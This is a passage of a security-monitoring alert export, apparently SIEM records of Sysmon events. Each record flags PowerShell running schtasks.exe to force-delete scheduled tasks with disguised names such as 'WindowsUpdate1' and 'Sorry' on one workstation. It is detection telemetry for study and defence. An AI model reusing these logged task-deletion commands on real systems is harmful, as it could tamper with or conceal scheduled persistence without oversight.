Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.405",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.302 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001067df2e00} +ProcessId: 3048 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.305581500Z"",""eventRecordID"":""3551"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.302\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001067df2e00}\r\nProcessId: 3048\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.302"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001067df2e00}"",""processId"":""3048"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.390",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.248 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00105edd2e00} +ProcessId: 360 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.270854500Z"",""eventRecordID"":""3550"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.248\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00105edd2e00}\r\nProcessId: 360\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.248"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00105edd2e00}"",""processId"":""360"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.375",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.199 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010bcdb2e00} +ProcessId: 6872 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.202710000Z"",""eventRecordID"":""3549"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.199\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010bcdb2e00}\r\nProcessId: 6872\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.199"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-0010bcdb2e00}"",""processId"":""6872"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.358",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.174 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001025da2e00} +ProcessId: 4972 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.177884400Z"",""eventRecordID"":""3548"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.174\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001025da2e00}\r\nProcessId: 4972\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.174"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001025da2e00}"",""processId"":""4972"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.355",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.130 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00105cd82e00} +ProcessId: 7992 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.132697500Z"",""eventRecordID"":""3547"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.130\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00105cd82e00}\r\nProcessId: 7992\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:07.130"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00105cd82e00}"",""processId"":""7992"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.316",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.094 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001015d62e00} +ProcessId: 748 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.098627200Z"",""eventRecordID"":""3546"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.094\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001015d62e00}\r\nProcessId: 748\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.094"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001015d62e00}"",""processId"":""748"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 